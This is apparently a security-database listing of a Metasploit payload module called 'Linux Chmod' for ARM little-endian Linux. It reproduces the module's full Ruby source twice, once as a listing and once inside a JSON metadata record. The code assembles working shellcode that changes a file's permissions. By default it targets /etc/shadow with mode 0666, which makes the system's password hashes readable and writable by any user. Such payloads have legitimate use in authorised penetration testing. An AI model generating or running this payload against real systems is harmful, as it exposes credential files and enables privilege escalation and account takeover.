Linux Chmod_MSF:PAYLOAD-LINUX-ARMLE-CHMOD-

Description

Runs chmod on the specified file with specified mode. Module Options msf use payload/linux/armle/chmod msf payloadchmod show actions ...actions... msf payloadchmod set ACTION msf payloadchmod show options ...show and set options... msf payloadchmod run...

Visit Original Source

Basic Information

ID MSF:PAYLOAD-LINUX-ARMLE-CHMOD-

Published Jan 14, 2026 at 18:54

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
CachedSize = 40

include Msf::Payload::Single

def initialize(info = {})
super(
merge_info(
info,
'Name' => 'Linux Chmod',
'Description' => 'Runs chmod on the specified file with specified mode.',
'Author' => 'bcoles',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'References' => [
['URL', 'https://man7.org/linux/man-pages/man2/chmod.2.html'],
['URL', 'https://github.com/bcoles/shellcode/blob/main/armle/chmod/chmod.s'],
]
)
)
register_options([
OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),
OptString.new('MODE', [ true, 'File mode (octal)', '0666' ]),
])
end

# @return [String] the full path of the file to be modified
def chmod_file_path
datastore['FILE'] || ''
end

# @return [Integer] the desired mode for the file
def mode
(datastore['MODE'] || '0666').oct
rescue StandardError => e
raise ArgumentError, "Invalid chmod mode '#{datastore['MODE']}': #{e.message}"
end

# @return [Integer] ARM LE instruction to load mode into r2 register
# For example: 0xe30011b6 ; mov r1, #0666 ; loads 0x1b6 (0o666) into r2
def chmod_instruction(mode)
0xe3000000 | ((mode & 0xF000) << 4) | (1 << 12) | (mode & 0x0FFF)
end

def generate(_opts = {})
raise ArgumentError, "chmod mode (#{mode}) is greater than maximum mode size (0xFFF)" if mode > 0xFFF

shellcode = [
0xe28f0014, # add r0, pc, #20 # pointer to path
chmod_instruction(mode), # movw r2, <mode>
0xe3a0700f, # mov r7, #15 # __NR_fchmodat
0xef000000, # svc 0x00000000 # syscall
0xe3a00000, # mov r0, #0 # exit code = 0
0xe3a07001, # mov r7, #1 # __NR_exit
0xef000000 # svc 0x00000000 # syscall
].pack('V*')
shellcode += chmod_file_path + "\x00"

# align our shellcode to 4 bytes
shellcode += "\x00" while shellcode.bytesize % 4 != 0

super.to_s + shellcode
end
end

{
    "lastseen": "2026-01-14T19:29:24",
    "description": "Runs chmod on the specified file with specified mode. Module Options msf use payload/linux/armle/chmod msf payloadchmod show actions ...actions... msf payloadchmod set ACTION msf payloadchmod show options ...show and set options... msf payloadchmod run...",
    "published": "2026-01-14T18:54:21",
    "modified": "2026-01-14T18:54:21",
    "type": "metasploit",
    "title": "Linux Chmod",
    "source": "",
    "references": "",
    "id": "MSF:PAYLOAD-LINUX-ARMLE-CHMOD-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nmodule MetasploitModule\n  CachedSize = 40\n\n  include Msf::Payload::Single\n\n  def initialize(info = {})\n    super(\n      merge_info(\n        info,\n        'Name' => 'Linux Chmod',\n        'Description' => 'Runs chmod on the specified file with specified mode.',\n        'Author' => 'bcoles',\n        'License' => MSF_LICENSE,\n        'Platform' => 'linux',\n        'Arch' => ARCH_ARMLE,\n        'References' => [\n          ['URL', 'https://man7.org/linux/man-pages/man2/chmod.2.html'],\n          ['URL', 'https://github.com/bcoles/shellcode/blob/main/armle/chmod/chmod.s'],\n        ]\n      )\n    )\n    register_options([\n      OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),\n      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ]),\n    ])\n  end\n\n  # @return [String] the full path of the file to be modified\n  def chmod_file_path\n    datastore['FILE'] || ''\n  end\n\n  # @return [Integer] the desired mode for the file\n  def mode\n    (datastore['MODE'] || '0666').oct\n  rescue StandardError => e\n    raise ArgumentError, \"Invalid chmod mode '#{datastore['MODE']}': #{e.message}\"\n  end\n\n  # @return [Integer] ARM LE instruction to load mode into r2 register\n  # For example: 0xe30011b6 ; mov r1, #0666 ; loads 0x1b6 (0o666) into r2\n  def chmod_instruction(mode)\n    0xe3000000 | ((mode & 0xF000) << 4) | (1 << 12) | (mode & 0x0FFF)\n  end\n\n  def generate(_opts = {})\n    raise ArgumentError, \"chmod mode (#{mode}) is greater than maximum mode size (0xFFF)\" if mode > 0xFFF\n\n    shellcode = [\n      0xe28f0014, # add r0, pc, #20  # pointer to path\n      chmod_instruction(mode), # movw r2, <mode>\n      0xe3a0700f, # mov r7, #15      # __NR_fchmodat\n      0xef000000, # svc 0x00000000   # syscall\n      0xe3a00000, # mov\tr0, #0       # exit code = 0\n      0xe3a07001, # mov r7, #1       # __NR_exit\n      0xef000000  # svc 0x00000000   # syscall\n    ].pack('V*')\n    shellcode += chmod_file_path + \"\\x00\"\n\n    # align our shellcode to 4 bytes\n    shellcode += \"\\x00\" while shellcode.bytesize % 4 != 0\n\n    super.to_s + shellcode\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/linux/armle/chmod.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/payload/linux/armle/chmod/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply